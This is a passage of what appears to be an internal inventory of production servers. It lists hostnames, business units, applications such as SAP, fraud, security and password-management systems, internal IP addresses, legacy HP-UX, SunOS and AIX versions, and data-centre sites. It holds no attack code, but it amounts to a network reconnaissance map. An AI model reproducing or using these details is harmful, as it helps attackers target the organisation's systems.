HP-UX 11.23 BOTHELL_7 #N/A #N/A 1 procst04 Prod Billing AR 24 AR 10.130.225.100 HP-UX 11.23 BOTHELL_7 #N/A #N/A 1 procst05 Prod Billing AR 24 AR 10.130.225.102 HP-UX 11.23 BOTHELL_7 #N/A #N/A 1 procst12 Prod Projects Samson - Customer DB 688 Samson - Customer DB 10.130.225.31 HP-UX 11.31 NEXUS #N/A #N/A 1 prodbc01 Prod IHAP DB cluster server 132 DB cluster server 10.1.16.130 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prodbc02 Prod IHAP DB cluster server 132 DB cluster server 10.1.16.131 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prodbc03 Prod IHAP DB cluster server 132 DB cluster server 10.1.16.132 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prodbc04 Prod IHAP DB cluster server 132 DB cluster server 10.1.16.136 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prodbc05 Prod IHAP DB cluster server 132 DB cluster server 10.1.16.204 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prodbc06 Prod IHAP DB cluster server 132 DB cluster server 10.1.16.205 HP-UX 11.11 TAMPA #N/A #N/A 1 prodbc07 Prod IHAP DB cluster server 132 DB cluster server 10.1.16.224 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prodbc08 Prod IHAP DB cluster server 132 DB cluster server 10.1.16.111 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prodbc09 Prod IHAP DB cluster server 132 DB cluster server 10.133.114.31 HP-UX 11.23 NEXUS #N/A #N/A 1 prodbc10 Prod IHAP DB cluster server 132 DB cluster server 10.133.114.32 HP-UX 11.23 NEXUS #N/A #N/A 1 prodbc11 Prod IHAP DB cluster server 132 DB cluster server 10.133.114.33 HP-UX 11.23 NEXUS #N/A #N/A 1 prodbc12 Prod IHAP DB cluster server 132 DB cluster server 10.133.114.34 HP-UX 11.23 NEXUS #N/A #N/A 1 prodbc13 Prod IHAP DB cluster server 132 DB cluster server 10.133.113.53 HP-UX 11.11 NEXUS #N/A #N/A 1 prodbc14 Prod IHAP DB cluster server 132 DB cluster server 10.133.113.54 HP-UX 11.11 NEXUS #N/A #N/A 1 prodbc15 Prod IHAP DB cluster server 132 DB cluster server 10.133.113.55 HP-UX 11.11 NEXUS #N/A #N/A 1 prodbc16 Prod IHAP DB cluster server 132 DB cluster server 10.133.113.56 HP-UX 11.23 NEXUS #N/A #N/A 1 prodbc17 Prod IHAP DB cluster server 132 DB cluster server 10.133.113.110 HP-UX 11.23 NEXUS #N/A #N/A 1 prodbc18 Prod IHAP DB cluster server 132 DB cluster server 10.133.113.111 HP-UX 11.23 NEXUS #N/A #N/A 1 prodig04 Prod Infra Infrastructure 253 Infrastructure 10.65.16.235 HP-UX 11.23 TAMPA #N/A #N/A 1 prodig05 Prod Infra Infrastructure 253 Infrastructure 10.133.81.75 HP-UX 11.23 NEXUS #N/A #N/A 1 prodns01 Prod Infra Infrastructure - DNS 254 Infrastructure - DNS 10.1.16.43 HP-UX 11.00 BOTHELL_7 #N/A #N/A 1 prodns02 Prod Infra Infrastructure - DNS 254 Infrastructure - DNS 10.1.16.46 HP-UX 11.00 BOTHELL_7 #N/A #N/A 1 prodns05 Prod Infra Infrastructure - DNS 254 Infrastructure - DNS 10.65.16.41 HP-UX 11.00 TAMPA #N/A #N/A 1 prodns07 Prod Infra Infrastructure - DNS 254 Infrastructure - DNS 10.133.113.71 HP-UX 11.23 NEXUS #N/A #N/A 1 prodns08 Prod Infra Infrastructure - DNS 254 Infrastructure - DNS 10.133.113.72 HP-UX 11.23 TAMPA #N/A #N/A 1 proegc01 Prod Infra OEM Grid Control 342 OEM Grid Control 10.133.35.91 HP-UX 11.23 NEXUS #N/A #N/A 1 proegc02 Prod Infra OEM Grid Control 342 OEM Grid Control 10.133.35.92 HP-UX 11.23 NEXUS #N/A #N/A 1 proegc03 Prod Infra OEM Grid Control 342 OEM Grid Control 10.133.35.93 HP-UX 11.23 NEXUS #N/A #N/A 1 proegc04 Prod Infra OEM Grid Control 342 OEM Grid Control 10.133.35.94 HP-UX 11.23 NEXUS #N/A #N/A 1 proema01 Prod IHAP Enterprise Mapping 179 enterprise mapping 10.1.16.48 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 proema02 Prod IHAP Enterprise Mapping 179 enterprise mapping 10.1.16.50 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 proepr01 Prod Projects #N/A #N/A #N/A 192.168.33.91 AIX 5.3 NEXUS #N/A #N/A 1 proepr02 Prod Projects #N/A #N/A #N/A 192.168.33.86 AIX 5.3 NEXUS #N/A #N/A 1 proepr03 Prod Projects #N/A #N/A #N/A 10.130.33.92 AIX 5.3 NEXUS #N/A #N/A 1 proepr04 Prod Projects #N/A #N/A #N/A 10.130.33.93 AIX 5.3 NEXUS #N/A #N/A 1 proepr05 Prod Projects #N/A #N/A #N/A 10.130.33.87 AIX 5.3 NEXUS #N/A #N/A 1 proers02 Prod IHAP Enterprise reporting 182 enterprise reporting 10.1.16.66 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 proesa01 Prod Infra Infrastructure 253 Infrastructure 10.1.24.158 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 proesa02 Prod Projects #N/A #N/A #N/A 10.133.113.73 HP-UX 11.31 NEXUS #N/A #N/A 1 proetl01 Prod IHAP Teradata 576 teradata 10.133.17.50 HP-UX 11.11 NEXUS #N/A #N/A 1 proetl02 Prod IHAP Teradata 576 teradata 10.133.17.51 HP-UX 11.11 NEXUS #N/A #N/A 1 proetl03 Prod IHAP Teradata 576 teradata 10.133.17.52 HP-UX 11.11 NEXUS #N/A #N/A 1 proetl04 Prod IHAP Teradata 576 teradata 10.133.17.53 HP-UX 11.11 NEXUS #N/A #N/A 1 profrd01 Prod IHAP Fraud 211 fraud 10.133.113.42 HP-UX 11.11 NEXUS #N/A #N/A 1 profrd03 Prod IHAP Fraud 211 fraud 10.133.129.33 HP-UX 11.11 NEXUS #N/A #N/A 1 prohrp01 Prod Projects #N/A #N/A #N/A 192.168.33.88 AIX 5.3 NEXUS #N/A #N/A 1 prohrp02 Prod Projects #N/A #N/A #N/A 192.168.33.94 AIX 5.3 NEXUS #N/A #N/A 1 prohrp03 Prod Projects #N/A #N/A #N/A 10.130.33.89 AIX 5.3 NEXUS #N/A #N/A 1 prohrp04 Prod Projects #N/A #N/A #N/A 10.130.33.90 AIX 5.3 NEXUS #N/A #N/A 1 prohrp05 Prod Projects #N/A #N/A #N/A 10.130.33.95 AIX 5.3 NEXUS #N/A #N/A 1 proidm01 Prod IHAP Oracle Identity Management 359 Oracleidentity management 10.133.33.53 HP-UX 11.23 NEXUS #N/A #N/A 1 proidm02 Prod IHAP Oracle Identity Management 359 Oracleidentity management 10.133.33.54 HP-UX 11.23 NEXUS #N/A #N/A 1 proiii03 Prod Infra precise 396 precise 10.1.17.25 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 proims11 Prod Projects #N/A #N/A #N/A 10.133.65.70 SunOS 5.10 NEXUS #N/A #N/A 1 proims13 Prod Projects #N/A #N/A #N/A 10.133.65.72 SunOS 5.10 NEXUS #N/A #N/A 1 proims14 Prod Projects #N/A #N/A #N/A 10.133.65.73 SunOS 5.10 NEXUS #N/A #N/A 1 proims15 Prod Projects #N/A #N/A #N/A 10.133.65.74 SunOS 5.10 NEXUS #N/A #N/A 1 proims16 Prod Projects #N/A #N/A #N/A 10.133.33.65 HP-UX 11.23 NEXUS #N/A #N/A 1 proims17 Prod Projects #N/A #N/A #N/A 10.133.33.66 HP-UX 11.23 NEXUS #N/A #N/A 1 proipc01 Prod Infra IP Control 264 IP Control 10.133.17.104 SunOS 5.10 NEXUS #N/A #N/A 1 proipc02 Prod Infra IP Control 264 IP Control 10.1.24.166 SunOS 5.10 BOTHELL_7 #N/A #N/A 1 proiqc01 Prod Infra IP Control 264 IP Control 10.133.17.86 SunOS 5.9 NEXUS #N/A #N/A 1 proisp01 Prod #N/A #N/A #N/A #N/A 10.130.33.98 AIX 5.3 NEXUS #N/A #N/A 1 proisp02 Prod #N/A #N/A #N/A #N/A 10.130.33.99 AIX 5.3 NEXUS #N/A #N/A 1 proitg01 Prod Infra Mercury ITG 298 Mercury ITG 10.133.33.52 HP-UX 11.23 NEXUS #N/A #N/A 1 proivr01 Prod IHAP IVR 271 IVR 10.1.16.214 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 proivr02 Prod IHAP IVR 271 IVR 10.1.16.215 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 projda01 Prod IHAP Retail Reinvention 429 Retail Reinvention 10.133.81.94 AIX 5.3 NEXUS #N/A #N/A 1 projda02 Prod IHAP Retail Reinvention 429 Retail Reinvention 10.133.81.95 AIX 5.3 NEXUS #N/A #N/A 1 projmp01 Prod Infra Infrastructure 253 Infrastructure 10.1.24.99 SunOS 5.10 BOTHELL_7 #N/A #N/A 1 prolnm01 Prod Infra Datacomm 129 DataComm 10.133.113.43 SunOS 5.9 NEXUS #N/A #N/A 1 prolnm02 Prod Infra Datacomm 129 DataComm 10.133.113.44 SunOS 5.9 NEXUS #N/A #N/A 1 prolnm03 Prod Infra Datacomm 129 DataComm 10.133.113.45 SunOS 5.9 NEXUS #N/A #N/A 1 prolnm04 Prod Infra Datacomm 129 DataComm 10.133.113.46 SunOS 5.9 NEXUS #N/A #N/A 1 prolnm05 Prod Infra Datacomm 129 DataComm 10.14.1.136 SunOS 5.9 FRISCO #N/A #N/A 1 prolnm06 Prod Infra Datacomm 129 DataComm 10.14.1.138 SunOS 5.9 FRISCO #N/A #N/A 1 prolog01 Prod Infra Infrastructure 253 Infrastructure 10.1.24.58 HP-UX 11.23 BOTHELL_7 #N/A #N/A 1 prolog02 Prod Infra Infrastructure 253 Infrastructure 10.133.17.68 HP-UX 11.23 NEXUS #N/A #N/A 1 proloy01 Prod IHAP Loyalty 644 Loyalty 10.1.16.21 HP-UX 11.00 BOTHELL_7 #N/A #N/A 1 promam01 Prod IHAP Application mapping 20 application mapping 10.133.17.60 HP-UX 11.11 NEXUS #N/A #N/A 1 prombx01 Prod #N/A #N/A #N/A #N/A 10.133.81.80 HP-UX 11.23 NEXUS #N/A #N/A 1 promcd03 Prod IHAP Merced 296 Merced 10.133.225.30 SunOS 5.9 NEXUS #N/A #N/A 1 promcd04 Prod IHAP ECHO 155 Echo 10.1.16.246 SunOS 5.9 BOTHELL_7 #N/A #N/A 1 promom01 Prod Infra Monitor of Monitor 306 Monitor of Monitor 10.133.17.70 HP-UX 11.11 NEXUS #N/A #N/A 1 promqc01 Prod Billing MQ Series 308 mq series 10.133.113.36 HP-UX 11.23 NEXUS #N/A #N/A 1 promqs01 Prod IHAP MQ Series 308 mq series 10.133.225.44 HP-UX 11.23 NEXUS #N/A #N/A 1 promqs02 Prod IHAP MQ Series 308 mq series 10.133.225.47 HP-UX 11.23 NEXUS #N/A #N/A 1 promto01 Prod Billing Maestro 288 Maestro Master 10.1.17.80 HP-UX 11.23 BOTHELL_7 #N/A #N/A 1 promto02 Prod Billing Maestro 288 Maestro Master 10.1.17.81 HP-UX 11.23 BOTHELL_7 #N/A #N/A 1 promtr01 Prod IHAP My T-Retail 320 My Tmo Retail 10.133.17.98 HP-UX 11.23 NEXUS #N/A #N/A 1 promtr02 Prod IHAP My T-Retail 320 My Tmo Retail 10.133.17.99 HP-UX 11.23 NEXUS #N/A #N/A 1 promtr03 Prod IHAP My T-Retail 320 My Tmo Retail 10.133.17.100 HP-UX 11.23 NEXUS #N/A #N/A 1 promtr07 Prod IHAP My T-Retail 320 My Tmo Retail 10.133.17.87 HP-UX 11.23 NEXUS #N/A #N/A 1 promtr08 Prod IHAP My T-Retail 320 My Tmo Retail 10.133.17.88 HP-UX 11.23 NEXUS #N/A #N/A 1 pronas01 Prod Infra DataComm - OpsWare 672 DataComm - OpsWare 10.133.17.26 SunOS 5.9 NEXUS #N/A #N/A 1 pronas02 Prod Infra DataComm - OpsWare 672 DataComm - OpsWare 10.133.17.27 SunOS 5.9 NEXUS #N/A #N/A 1 pronnm01 Prod Infra Openview 353 openview 10.1.17.22 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 pronnm02 Prod Infra Openview 353 openview 10.65.84.32 HP-UX 11.00 TAMPA #N/A #N/A 1 pronnm03 Prod Infra Openview 353 openview 10.65.24.65 HP-UX 11.11 TAMPA #N/A #N/A 1 prooim01 Prod Projects #N/A #N/A #N/A 10.133.33.95 HP-UX 11.23 TAMPA #N/A #N/A 1 prooim02 Prod Projects #N/A #N/A #N/A 10.133.33.96 HP-UX 11.23 NEXUS #N/A #N/A 1 proopv01 Prod Infra Openview 353 openview 10.1.80.104 HP-UX 11.00 BOTHELL_7 #N/A #N/A 1 proopv02 Prod Infra Openview 353 openview 10.65.16.48 HP-UX 11.00 TAMPA #N/A #N/A 1 proopv03 Prod Infra Openview 353 Openview 10.1.17.21 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 proopv05 Prod Infra Openview 353 Openview 10.65.24.64 HP-UX 11.11 TAMPA #N/A #N/A 1 proopw11 Prod Infra Opsware 356 Opsware 10.133.17.150 Linux 4AS-X86_64 NEXUS #N/A #N/A 1 proopw12 Prod Infra Opsware 356 Opsware 10.133.17.151 SunOS 5.10 NEXUS #N/A #N/A 1 proopw13 Prod Infra Opsware 356 Opsware 10.14.1.98 Linux 4AS-X86_64 FRISCO #N/A #N/A 1 proopw14 Prod Infra Opsware 356 Opsware 10.14.1.97 SunOS 5.10 FRISCO #N/A #N/A 1 proopw15 Prod Infra Opsware 356 Opsware 10.14.100.98 Linux 4AS-X86_64 FRISCO_SEG #N/A #N/A 1 proopw16 Prod Infra Opsware 356 Opsware 5.200.22.98 Linux 4AS-X86_64 FRISCO_NMNET #N/A #N/A 1 proopw17 Prod Infra Opsware 356 Opsware 10.1.24.167 Linux 4AS-X86_64 BOTHELL_7 #N/A #N/A 1 proopw18 Prod Infra Opsware 356 Opsware 10.1.24.168 SunOS 5.10 BOTHELL_7 #N/A #N/A 1 proopw19 Prod Infra Opsware 356 Opsware 10.1.108.30 Linux 4AS-X86_64 BTH7_BLD #N/A #N/A 1 proopw20 Prod Infra Opsware 356 Opsware 10.65.16.32 Linux 4AS-X86_64 TAMPA #N/A #N/A 1 proosr01 Prod IHAP Operational Sales Reporting 354 operational sales reporting 10.133.65.32 HP-UX 11.23 NEXUS #N/A #N/A 1 propaz01 Prod Infra Topaz 603 topaz 10.73.17.25 HP-UX 11.11 TAMPA #N/A #N/A 1 propcr01 Prod #N/A #N/A #N/A #N/A 10.133.17.65 HP-UX 11.23 NEXUS #N/A #N/A 1 propda02 Prod Infra DB archive 131 DB archive 10.1.16.174 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 propop01 Prod IHAP popup banner 387 popup banner 10.1.24.70 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 propop02 Prod IHAP popup banner 387 popup banner 10.1.24.71 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 proppi01 Prod #N/A #N/A #N/A #N/A 10.130.33.111 AIX 5.3 NEXUS #N/A #N/A 1 proppi02 Prod #N/A #N/A #N/A #N/A 10.130.33.112 AIX 5.3 NEXUS #N/A #N/A 1 proppi03 Prod #N/A #N/A #N/A #N/A 10.130.33.113 AIX 5.3 NEXUS #N/A #N/A 1 proppi04 Prod #N/A #N/A #N/A #N/A 10.130.33.114 AIX 5.3 NEXUS #N/A #N/A 1 propps01 Prod Infra Power Password 395 Power Password 10.1.24.57 HP-UX 11.23 BOTHELL_7 #N/A #N/A 1 propps02 Prod Infra Power Password 395 Power Password 10.133.17.67 HP-UX 11.23 NEXUS #N/A #N/A 1 proppw01 Prod Infra Power Password 395 Power Password 10.1.16.198 HP-UX 11.23 BOTHELL_7 #N/A #N/A 1 proppw02 Prod Infra Power Password 395 Power Password 10.1.17.26 HP-UX 11.23 BOTHELL_7 #N/A #N/A 1 proppw05 Prod Infra Power Password 395 Power Password 10.65.16.61 HP-UX 11.23 TAMPA #N/A #N/A 1 proppw06 Prod Infra Power Password 395 Power Password 10.65.24.53 HP-UX 11.23 TAMPA #N/A #N/A 1 proprf01 Prod Infra Perf View 381 Perf View 10.1.16.169 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 proprf02 Prod Projects #N/A #N/A #N/A 10.1.17.111 HP-UX 11.23 BOTHELL_7 #N/A #N/A 1 proprs01 Prod Billing PAG Reporting Server 370 PAG Reporting Server 10.133.81.38 HP-UX 11.11 NEXUS #N/A #N/A 1 proprt02 Prod Infra Unix Infrastructure 698 Print server 10.1.16.34 HP-UX 11.00 BOTHELL_7 #N/A #N/A 1 proptl01 Prod IHAP Retail Reinvention - Portal 703 Retail Reinvention - Portal 10.133.65.34 HP-UX 11.23 NEXUS #N/A #N/A 1 proqad01 Prod IHAP Quadstone 409 Quadstone 10.133.225.38 HP-UX 11.11 NEXUS #N/A #N/A 1 proqrm01 Prod Infra Infrastructure 253 Infrastructure 10.1.16.52 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 proqrm02 Prod Infra Infrastructure 253 Infrastructure 10.133.113.50 HP-UX 11.23 NEXUS #N/A #N/A 1 proqrm03 Prod Infra Infrastructure 253 Infrastructure 10.133.113.57 HP-UX 11.23 NEXUS #N/A #N/A 1 prorat01 Prod IHAP Revenue Assurance 435 revenue assurance 10.133.81.58 HP-UX 11.23 NEXUS #N/A #N/A 1 proray01 Prod Projects SunRay 558 SunRay 10.133.65.35 SunOS 5.10-X86 NEXUS #N/A #N/A 1 proray02 Prod Projects SunRay 558 SunRay 10.133.65.36 SunOS 5.10-X86 NEXUS #N/A #N/A 1 prorep01 Prod Billing Auxiliary DB 30 Auxiliary DB - Cust Copy 10.133.65.33 HP-UX 11.23 NEXUS #N/A #N/A 1 prormd03 Prod Infra Remedy 421 remedy 10.65.16.53 HP-UX 11.00 TAMPA #N/A #N/A 1 prormd04 Prod Infra Remedy 421 remedy 10.1.16.153 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prormd05 Prod Infra Remedy 421 remedy 10.1.16.154 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prormd06 Prod Infra Remedy 421 remedy 10.133.17.61 HP-UX 11.11 NEXUS #N/A #N/A 1 prormd07 Prod Infra Remedy 421 remedy 10.133.17.62 HP-UX 11.11 NEXUS #N/A #N/A 1 prormd08 Prod Infra Remedy 421 remedy 10.133.17.63 HP-UX 11.11 NEXUS #N/A #N/A 1 prormd09 Prod Infra Remedy 421 remedy 10.133.17.64 HP-UX 11.11 NEXUS #N/A #N/A 1 prormd10 Prod Infra Remedy 421 remedy 10.132.149.108 HP-UX 11.23 NEXUS #N/A #N/A 1 prormd20 Prod Infra Remedy 421 remedy 10.133.35.40 HP-UX 11.23 NEXUS #N/A #N/A 1 prormd21 Prod Infra Remedy 421 remedy 10.133.35.41 HP-UX 11.23 NEXUS #N/A #N/A 1 prormd22 Prod Infra Remedy 421 remedy 10.133.35.42 HP-UX 11.23 NEXUS #N/A #N/A 1 prormd24 Prod Infra Remedy 421 remedy 10.133.35.44 HP-UX 11.23 NEXUS #N/A #N/A 1 prormd25 Prod Projects #N/A #N/A #N/A 10.133.35.45 HP-UX 11.23 NEXUS #N/A #N/A 1 prosan01 Prod Infra SAN Infrastructure 699 SAN TEAM 10.1.24.147 SunOS 5.9 BOTHELL_7 #N/A #N/A 1 prosan02 Prod Infra SAN Infrastructure 699 SAN TEAM 10.1.24.148 SunOS 5.9 BOTHELL_7 #N/A #N/A 1 prosan03 Prod Infra SAN Infrastructure 699 SAN TEAM 10.1.24.149 SunOS 5.9 BOTHELL_7 #N/A #N/A 1 prosan04 Prod Infra SAN Infrastructure 699 SAN TEAM 10.1.24.150 SunOS 5.9 BOTHELL_7 #N/A #N/A 1 prosan05 Prod Infra SAN Infrastructure 699 SAN TEAM 10.14.1.171 SunOS 5.9 FRISCO #N/A #N/A 1 prosan06 Prod Infra SAN Infrastructure 699 SAN TEAM 10.14.1.172 SunOS 5.9 FRISCO #N/A #N/A 1 prosan07 Prod Infra SAN Infrastructure 699 SAN TEAM 10.65.16.65 SunOS 5.9 TAMPA #N/A #N/A 1 prosan08 Prod Infra SAN Infrastructure 699 SAN TEAM 10.65.16.36 SunOS 5.9 TAMPA #N/A #N/A 1 prosan09 Prod Infra SAN Infrastructure 699 SAN TEAM 10.132.113.50 SunOS 5.9 NEXUS #N/A #N/A 1 prosan10 Prod Infra SAN Infrastructure 699 SAN TEAM 10.132.113.52 SunOS 5.9 NEXUS #N/A #N/A 1 prosap01 Prod IHAP SAP - VPR 488 SAP - VPR 10.1.16.170 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap02 Prod IHAP SAP - HRQ 465 SAP - HRQ 10.1.24.31 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap03 Prod IHAP SAP - HRQ 465 SAP - HRQ 10.1.16.28 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap05 Prod IHAP SAP - ISP 467 SAP - ISP 10.1.16.30 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap06 Prod IHAP SAP - HRP 464 SAP - HRP 10.1.16.31 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap07 Prod IHAP SAP - VPR 488 SAP - VPR 10.1.24.32 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap08 Prod IHAP SAP - VDV 486 SAP - VDV 10.1.16.53 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap10 Prod IHAP SAP - HRP 464 SAP - HRP 10.1.16.69 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap11 Prod IHAP SAP - PCD 470 SAP - PCD 10.1.17.43 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap12 Prod IHAP SAP - VPR 488 SAP - VPR 10.1.16.24 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap13 Prod IHAP SAP - PCD 470 SAP - PCD 10.1.16.87 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap14 Prod IHAP SAP - PBP 469 SAP - PBP 10.1.16.172 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap15 Prod IHAP SAP - VPR 488 SAP - VPR 10.1.16.210 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap16 Prod IHAP SAP - EPR 460 SAP - EPR 10.1.16.27 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap17 Prod IHAP SAP - EPR 460 SAP - EPR 10.1.24.112 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap18 Prod IHAP SAP - EPR 460 SAP - EPR 10.1.24.113 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap19 Prod IHAP SAP - ISP 467 SAP - ISP 10.1.24.114 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap20 Prod IHAP SAP - VPR 488 SAP - VPR 10.1.16.221 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap21 Prod IHAP SAP - ISP 467 SAP - ISP 10.1.16.26 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap22 Prod IHAP SAP - ISP 467 SAP - ISP 10.1.16.171 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap24 Prod IHAP SAP - PDM 472 SAP - PDM 10.1.16.145 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap25 Prod IHAP SAP - PDM 472 SAP - PDM 10.1.24.202 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap26 Prod IHAP SAP - HRP 464 SAP - HRP 10.1.16.179 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap27 Prod IHAP SAP - HRP 464 SAP - HRP 10.1.16.112 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap28 Prod IHAP SAP - HRP 464 SAP - HRP 10.1.16.199 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap29 Prod IHAP SAP - PDM 472 SAP - PDM 10.1.24.203 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap30 Prod IHAP SAP - General 461 SAP - General 10.1.24.204 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap32 Prod IHAP SAP - PBP 469 SAP - PBP 10.1.16.134 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap34 Prod IHAP SAP - PCD 470 SAP - PCD 10.1.24.209 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap35 Prod IHAP SAP - General 461 SAP - General 10.1.24.210 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap36 Prod IHAP SAP - SMP 480 SAP - SMP 10.1.16.239 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosap37 Prod IHAP SAP - General 461 SAP - General 10.1.16.248 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosav01 Prod IHAP Save Offers 514 Save Offers 10.133.17.162 SunOS 5.10 NEXUS #N/A #N/A 1 prosav02 Prod IHAP Save Offers 514 Save Offers 10.133.17.163 SunOS 5.10 NEXUS #N/A #N/A 1 prosav03 Prod IHAP Save Offers 514 Save Offers 10.133.17.164 SunOS 5.10 NEXUS #N/A #N/A 1 prosav04 Prod IHAP Save Offers 514 Save Offers 10.133.17.132 SunOS 5.10 NEXUS #N/A #N/A 1 prosav05 Prod IHAP Save Offers 514 Save Offers 10.133.33.61 HP-UX 11.23 NEXUS #N/A #N/A 1 prosav06 Prod IHAP Save Offers 514 Save Offers 10.133.33.62 HP-UX 11.23 NEXUS #N/A #N/A 1 proscc01 Prod Projects Suncomm 557 Suncomm 10.130.225.56 HP-UX 11.23 NEXUS #N/A #N/A 1 proscc02 Prod Projects #N/A #N/A #N/A 10.130.225.57 HP-UX 11.23 NEXUS #N/A #N/A 1 proscc03 Prod Projects Suncomm 557 Suncomm 10.133.33.97 HP-UX 11.23 NEXUS #N/A #N/A 1 proscc04 Prod Projects #N/A #N/A #N/A 10.133.128.67 HP-UX 11.31 NEXUS #N/A #N/A 1 proscc05 Prod Projects #N/A #N/A #N/A 10.133.129.50 HP-UX 11.31 NEXUS #N/A #N/A 1 prosem01 Prod Infra Security 517 Security 10.1.61.100 SunOS 5.9 TAMPA #N/A #N/A 1 prosem02 Prod Infra Security 517 Security 10.1.61.101 SunOS 5.9 TAMPA #N/A #N/A 1 prosem04 Prod Infra Security 517 Security 10.1.61.103 SunOS 5.9 BOTHELL_7 #N/A #N/A 1 prosem05 Prod Infra Security 517 Security 10.46.63.102 SunOS 5.9 TAMPA #N/A #N/A 1 prosem06 Prod Infra Security 517 Security 10.46.63.103 SunOS 5.9 TAMPA #N/A #N/A 1 prosem07 Prod Infra Security 517 Security 10.81.63.102 SunOS 5.9 TAMPA #N/A #N/A 1 prosem08 Prod Infra Security 517 Security 10.81.63.103 SunOS 5.9 TAMPA #N/A #N/A 1 prosem09 Prod Infra Security 517 Security 10.65.61.102 SunOS 5.9 TAMPA #N/A #N/A 1 prosem10 Prod Infra Security 517 Security 10.65.61.103 SunOS 5.9 TAMPA #N/A #N/A 1 proser01 Prod IHAP Serialization 520 Serialization 10.133.225.41 HP-UX 11.11 NEXUS #N/A #N/A 1 proser02 Prod IHAP Serialization 520 Serialization 10.133.225.42 HP-UX 11.11 NEXUS #N/A #N/A 1 prosft01 Prod IHAP People Soft 380 People Soft 10.1.17.249 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosmp01 Prod #N/A #N/A #N/A #N/A 10.130.33.226 AIX 5.3 NEXUS #N/A #N/A 1 prosmp02 Prod #N/A #N/A #N/A #N/A 10.130.33.227 AIX 5.3 NEXUS #N/A #N/A 1 prospc01 Prod IHAP DataComm - Spectrum 673 DataComm - Spectrum 10.133.113.65 SunOS 5.10 NEXUS #N/A #N/A 1 prospc02 Prod IHAP DataComm - Spectrum 673 DataComm - Spectrum 10.14.1.127 SunOS 5.10 FRISCO #N/A #N/A 1 prospc03 Prod IHAP DataComm - Spectrum 673 DataComm - Spectrum 10.65.20.161 SunOS 5.10 TAMPA #N/A #N/A 1 prospc04 Prod IHAP DataComm - Spectrum 673 DataComm - Spectrum 10.1.4.193 SunOS 5.10 BOTHELL_7 #N/A #N/A 1 prospy01 Prod Billing Centivia 75 Centivia 10.133.225.36 HP-UX 11.23 NEXUS #N/A #N/A 1 prospy02 Prod Billing Centivia 75 Centivia 10.133.225.37 HP-UX 11.23 NEXUS #N/A #N/A 1 prostr01 Prod Billing Oracle Streams DB 361 Oracle Streams DB 10.1.16.104 HP-UX 11.11 BOTHELL_7 #N/A #N/A 1 prosys01 Prod Infra DataComm - Syslog 674 DataComm - Syslog 10.1.63.103 SunOS 5.9 BOTHELL_7 #N/A #N/A 1 prosys02 Prod Infra DataComm - Syslog 674 DataComm - Syslog 10.133.81.59 SunOS 5.9 NEXUS #N/A #N/A 1 prosys03 Prod Infra DataComm - Syslog 674 DataComm - Syslog 10.133.81.60 SunOS 5.9 NEXUS #N/A #N/A 1 prosys04 Prod Infra DataComm - Syslog 674 DataComm - Syslog 10.14.1.132 SunOS 5.9 FRISCO #N/A #N/A 1 prosys05 Prod Infra DataComm - Syslog 674 DataComm - Syslog 10.14.1.134 SunOS 5.9 FRISCO #N/A #N/A 1 protbm01 Prod Projects #N/A #N/A #N/A 10.133.65.54 HP-UX 11.23 NEXUS #N/A #N/A 1 protbm01 Prod Projects #N/A #N/A #N/A 10.133.65.54 HP-UX 11.31 NEXUS #N/A #N/A 1 protbm02 Prod Projects #N/A #N/A #N/A 10.133.65.55 HP-UX 11.31 NEXUS #N/A #N/A 1 protbm02 Prod Projects #N/A #N/A #N/A 10.133.65.55 HP-UX 